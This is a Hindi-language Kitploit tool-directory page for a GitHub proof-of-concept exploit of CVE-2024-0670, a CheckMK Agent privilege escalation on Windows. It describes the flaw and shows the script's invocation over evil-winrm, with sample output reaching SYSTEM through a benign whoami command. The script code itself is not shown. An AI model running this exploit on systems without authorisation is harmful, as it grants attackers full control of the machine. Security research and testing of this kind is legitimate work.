Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-0670 — CVE-2024-0670 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/magicrc/cve-2024-0670
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmagicrc/cve-2024-0670

CVE-2024-0670

CVE-2024-0670 के लिए PoC

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2024-0670 PoC

यह रिपॉज़िटरी CVE-2024-0670 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट प्रदान करती है, जो Windows सिस्टम पर CheckMK Agent को प्रभावित करती है। यह भेद्यता तब उत्पन्न होती है जब CheckMK Agent C:\Windows\Temp निर्देशिका में अस्थायी फ़ाइलें बनाता और निष्पादित करता है। एक हमलावर उस निर्देशिका में लेखन-सुरक्षा (write protection) के साथ दुर्भावनापूर्ण फ़ाइलें पहले से रखकर इस व्यवहार का दुरुपयोग कर सकता है। जब एजेंट कोई ऐसी अस्थायी फ़ाइल बनाने का प्रयास करता है जो पहले से रीड-ओनली के रूप में मौजूद है, तो वह उसे ओवरराइट करने में विफल रहता है लेकिन फिर भी मौजूदा फ़ाइल को SYSTEM विशेषाधिकारों के साथ निष्पादित कर देता है, जिससे विशेषाधिकार वृद्धि (privilege escalation) संभव हो जाती है।

परामर्श संदर्भ: SEC Consult - Checkmk Agent में लिखने योग्य फ़ाइलों के माध्यम से स्थानीय विशेषाधिकार वृद्धि


⚠️ अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक, अनुसंधान और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
इस कोड का उपयोग उन सिस्टमों पर न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।
लेखक किसी भी क्षति या दुरुपयोग के लिए जिम्मेदार नहीं है।


उपयोग

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"

उदाहरण

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer... 
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
टूल डाउनलोड करें